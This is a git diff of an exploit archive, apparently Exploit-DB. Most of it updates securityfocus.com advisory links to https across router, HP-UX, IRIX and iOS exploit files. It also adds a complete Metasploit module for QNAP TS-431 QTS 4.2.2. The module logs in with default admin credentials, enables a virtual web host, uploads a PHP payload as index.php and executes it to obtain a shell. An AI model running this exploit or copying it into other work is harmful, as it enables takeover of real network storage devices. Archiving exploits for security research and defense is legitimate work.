-1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69811/info +source: https://www.securityfocus.com/bid/69811/info Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability. diff --git a/exploits/hardware/remote/43142.c b/exploits/hardware/remote/43142.c index 15745092c..f1adac689 100644 --- a/exploits/hardware/remote/43142.c +++ b/exploits/hardware/remote/43142.c @@ -1,5 +1,5 @@ -# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c -# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html +// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c +// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html #include #include diff --git a/exploits/hardware/dos/46469.py b/exploits/hardware/remote/46469.py similarity index 100% rename from exploits/hardware/dos/46469.py rename to exploits/hardware/remote/46469.py diff --git a/exploits/hardware/remote/46506.rb b/exploits/hardware/remote/46506.rb new file mode 100755 index 000000000..361b8e401 --- /dev/null +++ b/exploits/hardware/remote/46506.rb @@ -0,0 +1,268 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'base64' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'QNAP TS-431 QTS < 4.2.2 - Remote Command Execution', + 'Description' => %q{ + This module creates a virtual web server and uploads the php payload into it. + Admin privileges cannot access any server files except File Station files. + The user who is authorized to create Virtual Web Server can upload malicious php file by activating the server. + Exploit creates a new directory into File Station to connect to the web server. + However, only the "index.php" file is allowed to work in the virtual web server directory. + No files can be executed except "index.php". Gives an access error. + After the harmful "index.php" has been uploaded, the shell can be retrieved from the server. + There is also the possibility of working in higher versions. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/QNAP-QTS-4-2-2-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['QNAP QTS <= 4.2.2', {}] + ], + 'DisclosureDate' => '06 March 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptBool.new('SSL', [true, 'Use SSL', false]), + OptString.new('TARGETURI', [true, 'The base path to QNAP', '/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', 'admin']), + ], self.class) + end +## +# Check Exploit Vulnerable +## + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/cgi-bin/login.html") + }) + + if res and res.code == 200 and res.body =~ /dc=4.2./ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + return res + end +## +# Login +## + def exploit + + b64pwd = Base64.encode64("#{datastore['PASS']}") + b64 = b64pwd.split('=').first + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/cgi-bin/authLogin.cgi"), + 'vars_post' => { + "user" => datastore['USER'], + "pwd" => "#{b64}=", + "serviceKey" => "1" + } + }) + + if res and res.code == 200 and res.body =~ /authSid/ + print_good("Login successful") + nasid = res.body.split("authSid> 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/userConfig.cgi"), + 'vars_post' => { + "func" => "updateLoginTime", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /true/ + print_good("Update Login Time Successful") + else + print_error("Update failed") + end + +## +# Create Folder in File Station for Web Server +## + cmdfile = "cmd#{rand_text_alphanumeric(rand(5) + 5)}" + print_status("Web Folder = /#{cmdfile}") + print_status("Attempting to create a folder via File Station.") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/wizReq.cgi?&wiz_func=share_create&action=add_share"), + 'vars_post' => { + "share_name" => cmdfile, + "comment" => "", + "guest" => "deny", + "hidden" => "0", + "oplocks" => "1", + "EncryptData" => "0", + "wizard_filter" => "", + "user_wizard_filter" => "", + "userw0" => "#{datastore['USER']}", + "userd_len" => "0", + "userw_len" => "1", + "usero_len" => "0", + "access_r" => "setup_users", + "img_file_path" => "", + "path_type" => "auto", + "quotaSettings" => "", + "quota_size" => "", + "recycle_bin" => "1", + "recycle_bin_administrators_only" => "0", + "quotaRadio" => "0", + "vol_no" => "1", + "addToMediaFolder" => "0", + "qsync" => "0", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /buildTime/ + print_good("File Create Successful") + else + print_error("File Create Failed") + end +## +# Enable Virtual Host +## + print_status("Attempting to Enable Virtual Host") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/net/networkRequest.cgi?&subfunc=web_srv&apply=1&todo=set_enable"), + 'vars_post' => { + "enable" => "1", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 + print_good("Virtual Host Enabled") + else + print_error("Process Failed") + end +## +# Enable Virtual Host +## + print_status("Attempting to Create Virtual Host") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/net/networkRequest.cgi?&subfunc=web_srv"), + 'vars_post' => { + "apply" => "1", + "share_folder" => "1", + "manual_path" => cmdfile, + "vhost_name" => "cmd", + "vhost_port" => "4443", + "vhost_ssl" => "0", + "todo" => "add_vhost", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 + print_good("Virtual Host Started on port 4443") + else + print_error("Process Failed") + end +## +# Fetching upload_id information +## + print_status("Attempting to Upload get Upload ID") + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/cgi-bin/filemanager/utilRequest.cgi?func=start_chunked_upload"), + 'vars_post' => { + "upload_root_dir" => "/#{cmdfile}", + "sid" => "#{nasid}" + } + }) + + if res and res.code == 200 and res.body =~ /upload_id/ + print_good("Login successful") + uploadid = res.body.split("upload_id")[1].split('"')[2] + print_status("Upload ID = #{uploadid}") + else + print_error("Login failed") + end +## +# Upload Payload +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}" + data << "\r\nContent-Disposition: form-data; name=\"fileName\"\r\n\r\n" + data << "msf.php\r\n-----------------------------{boundary}" + data << "\r\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" + data << "Content-Type: application/octet-stream\r\n\r\n" + data << payload.encoded + data << "\r\n-----------------------------{boundary}--\r\n" + + print_status("Attempting to Upload Payload to Reverse Shell") + + res = send_request_raw( + { + 'method' => "POST", + 'uri' => normalize_uri(target_uri, "/cgi-bin/filemanager/utilRequest.cgi?sid=#{nasid}&func=chunked_upload&dest_path=/#{cmdfile}&overwrite=1&upload_root_dir=/#{cmdfile}&upload_id=#{uploadid}&offset=0&filesize=1115&upload_name=index.php&settime=1&mtime=1551868245"), + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}', + }, + 'cookie' => cookie + }) + + if res and res.code == 200 + print_good("Payload Uploaded Successful") + else + print_error("Upload Failed") + end +## +# Execute the Payload +## + print_status("Attempting to execute the payload...") + + res = request_url("http://#{rhost}:4443/index.php") + + if res and res.code == 200 + print_good "Payload executed successfully" + end + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/hardware/remote/9209.txt b/exploits/hardware/remote/9209.txt index 9edd4ed4a..dbdca9889 100644 --- a/exploits/hardware/remote/9209.txt +++ b/exploits/hardware/remote/9209.txt @@ -86,7 +86,7 @@ IE even this can be supressed, see this one: http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/ Unlike the already documented CSRF vulnerability ( -http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated +https://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated session. This means someone can even post some crafted [img] link on a forum and a dd-wrt router owner visiting the forum will get owned :) diff --git a/exploits/hardware/webapps/25139.txt b/exploits/hardware/webapps/25139.txt index 102cdc6d4..761ce17c4 100644 --- a/exploits/hardware/webapps/25139.txt +++ b/exploits/hardware/webapps/25139.txt @@ -426,7 +426,7 @@ CORE-2013-0301 is published as 'user-release'. 10. *References* [1] http://www.vivotek.com/web/product/NetworkCameras.aspx -[2] http://www.securityfocus.com/bid/54476. +[2] https://www.securityfocus.com/bid/54476. [3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx. 11. *About CoreLabs* diff --git a/exploits/hardware/webapps/27320.txt b/exploits/hardware/webapps/27320.txt index 33e62226a..bace6ee94 100644 --- a/exploits/hardware/webapps/27320.txt +++ b/exploits/hardware/webapps/27320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16839/info +source: https://www.securityfocus.com/bid/16839/info The SpeedTouch 500 series are prone to a cross-site scripting vulnerability. This issue is due to a failure in the devices to properly sanitize user-supplied input. diff --git a/exploits/hardware/webapps/28283.txt b/exploits/hardware/webapps/28283.txt index 24aea9997..a424369be 100644 --- a/exploits/hardware/webapps/28283.txt +++ b/exploits/hardware/webapps/28283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19180/info +source: https://www.securityfocus.com/bid/19180/info The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/webapps/36286.txt b/exploits/hardware/webapps/36286.txt index 7a56ca2d1..00b007363 100644 --- a/exploits/hardware/webapps/36286.txt +++ b/exploits/hardware/webapps/36286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50520/info +source: https://www.securityfocus.com/bid/50520/info DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/hardware/webapps/36865.txt b/exploits/hardware/webapps/36865.txt index 20073608e..f0787ebcb 100644 --- a/exploits/hardware/webapps/36865.txt +++ b/exploits/hardware/webapps/36865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/webapps/37135.txt b/exploits/hardware/webapps/37135.txt index 5b50b2814..71ca59a56 100644 --- a/exploits/hardware/webapps/37135.txt +++ b/exploits/hardware/webapps/37135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53355/info +source: https://www.securityfocus.com/bid/53355/info iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server. diff --git a/exploits/hardware/webapps/37982.pl b/exploits/hardware/webapps/37982.pl index 23b748c0f..cced854ab 100755 --- a/exploits/hardware/webapps/37982.pl +++ b/exploits/hardware/webapps/37982.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56320/info +source: https://www.securityfocus.com/bid/56320/info TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/webapps/38604.txt b/exploits/hardware/webapps/38604.txt index 4315395c7..448f40930 100644 --- a/exploits/hardware/webapps/38604.txt +++ b/exploits/hardware/webapps/38604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60847/info +source: https://www.securityfocus.com/bid/60847/info Mobile USB Drive HD is prone to multiple local file-include and arbitrary file-upload vulnerabilities because it fails to adequately validate files before uploading them. diff --git a/exploits/hardware/webapps/38853.sh b/exploits/hardware/webapps/38853.sh index f84d3ae18..c687ae1ec 100755 --- a/exploits/hardware/webapps/38853.sh +++ b/exploits/hardware/webapps/38853.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64043/info +source: https://www.securityfocus.com/bid/64043/info Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. diff --git a/exploits/hardware/webapps/41671.txt b/exploits/hardware/webapps/41671.txt index 8f25e0fa0..04bff5457 100644 --- a/exploits/hardware/webapps/41671.txt +++ b/exploits/hardware/webapps/41671.txt @@ -184,7 +184,7 @@ http:///PoC.html 4) Information Disclosure (CVE-2001-1341) This vulnerability is a known issue to IPC@CHIP since 2001. -See: http://www.securityfocus.com/bid/2767/info +See: https://www.securityfocus.com/bid/2767/info The following URL can be used to open the "ChipCfg" file on a Solar-Log device: http:///ChipCfg diff --git a/exploits/hp-ux/dos/19278.pl b/exploits/hp-ux/dos/19278.pl index 1e587227a..fae4e15a3 100755 --- a/exploits/hp-ux/dos/19278.pl +++ b/exploits/hp-ux/dos/19278.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/352/info +source: https://www.securityfocus.com/bid/352/info Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter. diff --git a/exploits/hp-ux/dos/20373.txt b/exploits/hp-ux/dos/20373.txt index 6ce5fc6f5..c71f7b54a 100644 --- a/exploits/hp-ux/dos/20373.txt +++ b/exploits/hp-ux/dos/20373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1886/info +source: https://www.securityfocus.com/bid/1886/info cu is a unix utility that is used for communication between two hosts (usually over phone lines). It is typically isntalled setuid root so that it can access communications hardware when executed by a regular user. diff --git a/exploits/hp-ux/dos/22552.txt b/exploits/hp-ux/dos/22552.txt index 88f192dab..5a60108a0 100644 --- a/exploits/hp-ux/dos/22552.txt +++ b/exploits/hp-ux/dos/22552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7459/info +source: https://www.securityfocus.com/bid/7459/info It has been reported that a problem in the rexec program included with some versions of HP-UX may be vulnerable to a boundary condition error. It may be possible for a local user to exploit this vulnerability to gain elevated privileges on the system. diff --git a/exploits/hp-ux/dos/22561.txt b/exploits/hp-ux/dos/22561.txt index 23bd58a2a..79bb5f396 100644 --- a/exploits/hp-ux/dos/22561.txt +++ b/exploits/hp-ux/dos/22561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7489/info +source: https://www.securityfocus.com/bid/7489/info HP-UX rwrite utility has been reported prone to a buffer overflow vulnerability. Although unconfirmed code execution with elevated privileges may be possible. diff --git a/exploits/hp-ux/dos/23236.txt b/exploits/hp-ux/dos/23236.txt index 8bf4e2313..30dad5a02 100644 --- a/exploits/hp-ux/dos/23236.txt +++ b/exploits/hp-ux/dos/23236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8795/info +source: https://www.securityfocus.com/bid/8795/info It has been reported that dtprintinfo, installed setuid root by default, is susceptible to a locally exploitable buffer overflow vulnerability. The condition is triggered when the value of the DISPLAY environment variable is set to a string exceeding 9777 bytes in length. The vulnerability may allow for local attackers to gain root privileges on the affected host. diff --git a/exploits/hp-ux/local/19535.pl b/exploits/hp-ux/local/19535.pl index 8df23a648..6c356a793 100755 --- a/exploits/hp-ux/local/19535.pl +++ b/exploits/hp-ux/local/19535.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/683/info +#source: https://www.securityfocus.com/bid/683/info # #Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. diff --git a/exploits/hp-ux/local/19990.txt b/exploits/hp-ux/local/19990.txt index 14d3c8500..c8dbed6ba 100644 --- a/exploits/hp-ux/local/19990.txt +++ b/exploits/hp-ux/local/19990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1302/info +source: https://www.securityfocus.com/bid/1302/info The programmers of the 'man' command on various HPUX releases have made several fatal mistakes that allow an attacker to trivially set a trap that could result in any arbitrary file being overwritten on the system when root runs the 'man' command. diff --git a/exploits/hp-ux/local/20002.txt b/exploits/hp-ux/local/20002.txt index e3a1dc681..52442cc7e 100644 --- a/exploits/hp-ux/local/20002.txt +++ b/exploits/hp-ux/local/20002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1327/info +source: https://www.securityfocus.com/bid/1327/info A vulnerability exists in the snmpd included with HPUX 11, from Hewlett Packard. The configuration file for the snmpd is world writable. This could allow any user on the system to view and/or alter the settings of the snmp daemon. This in turn could be used to alter the configuration of the system, including, but not limited to, routing, addressing, arp caches, the status of connections, and so on. It is also possible this could be used to elevate access levels. diff --git a/exploits/hp-ux/local/20162.txt b/exploits/hp-ux/local/20162.txt index 8f02d0e43..18dacbb4a 100644 --- a/exploits/hp-ux/local/20162.txt +++ b/exploits/hp-ux/local/20162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1602/info +source: https://www.securityfocus.com/bid/1602/info A vulnerability exists in HP-UX, from Hewlett Packard, under certain configurations. Version 11.0 is confirmed to have this problem; other versions may also be susceptible. If the CLEAR_TMP option in /etc/rc.config.d is set to 1, meaning enabled, it is possible for a local user to create a symbolic link in /tmp that will be followed prior to being removed. This will allow the local user to overwrite any file upon reboot. diff --git a/exploits/hp-ux/local/20329.sh b/exploits/hp-ux/local/20329.sh index e04b41675..a12c5ea36 100755 --- a/exploits/hp-ux/local/20329.sh +++ b/exploits/hp-ux/local/20329.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1845/info +source: https://www.securityfocus.com/bid/1845/info crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerabiltiy in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented with HP-UX is a access controlled binary. Users are permitted to run crontab only if they have an access entry in the crontab.allow file. diff --git a/exploits/hp-ux/local/20386.txt b/exploits/hp-ux/local/20386.txt index ffb8d1361..e13b53832 100644 --- a/exploits/hp-ux/local/20386.txt +++ b/exploits/hp-ux/local/20386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1919/info +source: https://www.securityfocus.com/bid/1919/info The registrar service that ships with version 10.20 (possibly others) of HP's HP-UX operating system contains a vulnerability that may allow a local user to read any file on the hosts filesystem. The service (which listens on tcp port 1712) writes to a log file, /etc/opt/resmon/log/registrar.log. diff --git a/exploits/hp-ux/local/20396.sh b/exploits/hp-ux/local/20396.sh index 9f2318c60..568a245a1 100755 --- a/exploits/hp-ux/local/20396.sh +++ b/exploits/hp-ux/local/20396.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1929/info +# source: https://www.securityfocus.com/bid/1929/info # # Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. # diff --git a/exploits/hp-ux/local/20724.txt b/exploits/hp-ux/local/20724.txt index db662ce8a..45507b612 100644 --- a/exploits/hp-ux/local/20724.txt +++ b/exploits/hp-ux/local/20724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2535/info +source: https://www.securityfocus.com/bid/2535/info Shareplex is a database replication tool from Quest Software. diff --git a/exploits/hp-ux/local/21098.c b/exploits/hp-ux/local/21098.c index d7c26f129..5699b59bf 100644 --- a/exploits/hp-ux/local/21098.c +++ b/exploits/hp-ux/local/21098.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3279/info +// source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. diff --git a/exploits/hp-ux/local/21577.c b/exploits/hp-ux/local/21577.c index e99ffaada..60e0d14a7 100644 --- a/exploits/hp-ux/local/21577.c +++ b/exploits/hp-ux/local/21577.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5088/info +// source: https://www.securityfocus.com/bid/5088/info A vulnerability has been reported in the /opt/cifsclient/bin/cifslogin utility distributed with CIFS/9000. The utility is prone to several buffer overflow conditions and may lead to root compromise. diff --git a/exploits/hp-ux/local/22231.txt b/exploits/hp-ux/local/22231.txt index 3bb30171d..e6457a2b4 100644 --- a/exploits/hp-ux/local/22231.txt +++ b/exploits/hp-ux/local/22231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6800/info +source: https://www.securityfocus.com/bid/6800/info It has been reported that the HPUX wall executable may be prone to a buffer overflow condition. This buffer overflow is alleged to be triggered when an excessive amount of data is redirected into wall as a message intended to be broadcast. diff --git a/exploits/hp-ux/local/22246.c b/exploits/hp-ux/local/22246.c index eda89132b..b009ea35d 100644 --- a/exploits/hp-ux/local/22246.c +++ b/exploits/hp-ux/local/22246.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6836/info +// source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. diff --git a/exploits/hp-ux/local/22247.sh b/exploits/hp-ux/local/22247.sh index 5853038ce..6eeae58a2 100755 --- a/exploits/hp-ux/local/22247.sh +++ b/exploits/hp-ux/local/22247.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6836/info +source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. diff --git a/exploits/hp-ux/local/22248.sh b/exploits/hp-ux/local/22248.sh index f975d3325..1b2856a33 100755 --- a/exploits/hp-ux/local/22248.sh +++ b/exploits/hp-ux/local/22248.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6837/info +source: https://www.securityfocus.com/bid/6837/info The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner. diff --git a/exploits/hp-ux/local/23341.c b/exploits/hp-ux/local/23341.c index 0b9e09c7b..085908fc0 100644 --- a/exploits/hp-ux/local/23341.c +++ b/exploits/hp-ux/local/23341.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8985/info +// source: https://www.securityfocus.com/bid/8985/info HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges. diff --git a/exploits/hp-ux/local/23342.c b/exploits/hp-ux/local/23342.c index aba036047..9ad84abac 100644 --- a/exploits/hp-ux/local/23342.c +++ b/exploits/hp-ux/local/23342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8985/info +// source: https://www.securityfocus.com/bid/8985/info HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges. diff --git a/exploits/hp-ux/local/23343.c b/exploits/hp-ux/local/23343.c index 7018e064f..c8c28b1af 100644 --- a/exploits/hp-ux/local/23343.c +++ b/exploits/hp-ux/local/23343.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8986/info +// source: https://www.securityfocus.com/bid/8986/info HP has reported that some Software Distributor (SD) utilities are prone to a locally exploitable buffer-overrun vulnerability. Affected utilities include swinstall(1M) and swverify(1M). diff --git a/exploits/hp-ux/local/24210.pl b/exploits/hp-ux/local/24210.pl index 77b797890..f885e5512 100755 --- a/exploits/hp-ux/local/24210.pl +++ b/exploits/hp-ux/local/24210.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10551/info +source: https://www.securityfocus.com/bid/10551/info HP-UX X Font Server is reportedly affected by a local buffer overflow vulnerability. This issue is due to a failure of the application to properly validate the length of a user-supplied string before copying it into a finite buffer. diff --git a/exploits/hp-ux/local/28984.pl b/exploits/hp-ux/local/28984.pl index 022389dd0..6dd6f168a 100755 --- a/exploits/hp-ux/local/28984.pl +++ b/exploits/hp-ux/local/28984.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21035/info +source: https://www.securityfocus.com/bid/21035/info HP Tru64 is prone to a local privilege-escalation vulnerability. @@ -26,7 +26,7 @@ Successful exploits will result in a complete compromise of vulnerable computers # # References: # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235 - # http://www.securityfocus.com/bid/21085 + # https://www.securityfocus.com/bid/21085 # # Tested on Windows XP SP1 with # Universal FTP Server 1.0.44 diff --git a/exploits/hp-ux/remote/22733.c b/exploits/hp-ux/remote/22733.c index 2a0d194f2..965c6d20a 100644 --- a/exploits/hp-ux/remote/22733.c +++ b/exploits/hp-ux/remote/22733.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7825/info +// source: https://www.securityfocus.com/bid/7825/info A vulnerability has been discovered in the HP-UX 11 ftpd daemon. The problem can be triggered using the FTP REST command. By specifying a specially calculated numeric argument to the command, it is possible to disclose the contents of that numeric location in process memory. This issue may be exploited to disclose the contents of sensitive files, such as /etc/passwd. diff --git a/exploits/immunix/local/19875.txt b/exploits/immunix/local/19875.txt index 5c7474a9c..88271108d 100644 --- a/exploits/immunix/local/19875.txt +++ b/exploits/immunix/local/19875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1139/info +source: https://www.securityfocus.com/bid/1139/info PostgreSQL is a free RDBMS that is released under a Berkeley style license. PostgreSQL stores passwords for database users in a binary file called pg_shadow. This file is readable by root and the postgres user. Unfortunately, these passwords are stored in cleartext form and can be obtained if a user with read access to the file runs strings on it. While this is only readable by root and the postgres user (by default), it allows either one (or whoever else has read access to the file) to get the passwords for all databases and bypass authentication completely. diff --git a/exploits/immunix/local/20187.c b/exploits/immunix/local/20187.c index 325a2a0c4..5bec215a1 100644 --- a/exploits/immunix/local/20187.c +++ b/exploits/immunix/local/20187.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1634/info +source: https://www.securityfocus.com/bid/1634/info nectiva 4.x/5.x,Debian 2.x,IBM AIX 3.x/4.x,Mandrake 7,RedHat 5.x/6.x,IRIX 6.x, Solaris 2.x/7/8,Turbolinux 6.x,Wirex Immunix OS 6.2 Locale Subsystem Format String diff --git a/exploits/ios/dos/31057.html b/exploits/ios/dos/31057.html index 20e0b1851..57f6a7c72 100644 --- a/exploits/ios/dos/31057.html +++ b/exploits/ios/dos/31057.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27442/info +source: https://www.securityfocus.com/bid/27442/info Apple iPhone is prone to a remote denial-of-service vulnerability. diff --git a/exploits/ios/dos/38032.pl b/exploits/ios/dos/38032.pl index 3aaf78b73..d643d438f 100755 --- a/exploits/ios/dos/38032.pl +++ b/exploits/ios/dos/38032.pl @@ -16,7 +16,7 @@ # FaceBook : https://www.facebook.com/mohammadreza.espargham -#Source : http://www.securityfocus.com/bid/75217/info +#Source : https://www.securityfocus.com/bid/75217/info # 1.run perl code diff --git a/exploits/ios/local/35010.txt b/exploits/ios/local/35010.txt index 9185390de..a3d959a53 100644 --- a/exploits/ios/local/35010.txt +++ b/exploits/ios/local/35010.txt @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/45010/info +// source: https://www.securityfocus.com/bid/45010/info // // Apple iOS is prone to a local privilege-escalation vulnerability. // diff --git a/exploits/ios/remote/38058.py b/exploits/ios/remote/38058.py index a175a216f..26abc3c81 100755 --- a/exploits/ios/remote/38058.py +++ b/exploits/ios/remote/38058.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56665/info +source: https://www.securityfocus.com/bid/56665/info Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack. diff --git a/exploits/ios/remote/38634.txt b/exploits/ios/remote/38634.txt index 5463e107b..3e89a6ae5 100644 --- a/exploits/ios/remote/38634.txt +++ b/exploits/ios/remote/38634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61081/info +source: https://www.securityfocus.com/bid/61081/info Air Drive Plus is prone to multiple input validation vulnerabilities including a local file-include vulnerability, an arbitrary file-upload vulnerability, and an HTML-injection vulnerability. diff --git a/exploits/ios/remote/39114.txt b/exploits/ios/remote/39114.txt index 1cea26274..8af21eeca 100644 --- a/exploits/ios/remote/39114.txt +++ b/exploits/ios/remote/39114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66108/info +source: https://www.securityfocus.com/bid/66108/info Apple iOS is affected by a security-bypass vulnerability. diff --git a/exploits/irix/dos/19357.sh b/exploits/irix/dos/19357.sh index ae5c8bc68..aaf27c216 100755 --- a/exploits/irix/dos/19357.sh +++ b/exploits/irix/dos/19357.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/471/info +source: https://www.securityfocus.com/bid/471/info The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands. diff --git a/exploits/irix/dos/21431.txt b/exploits/irix/dos/21431.txt index 55c5abe76..c1874999f 100644 --- a/exploits/irix/dos/21431.txt +++ b/exploits/irix/dos/21431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4642/info +source: https://www.securityfocus.com/bid/4642/info Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems. diff --git a/exploits/irix/dos/22638.txt b/exploits/irix/dos/22638.txt index 7179b0389..8168f20b0 100644 --- a/exploits/irix/dos/22638.txt +++ b/exploits/irix/dos/22638.txt @@ -1,4 +1,4 @@ -source: 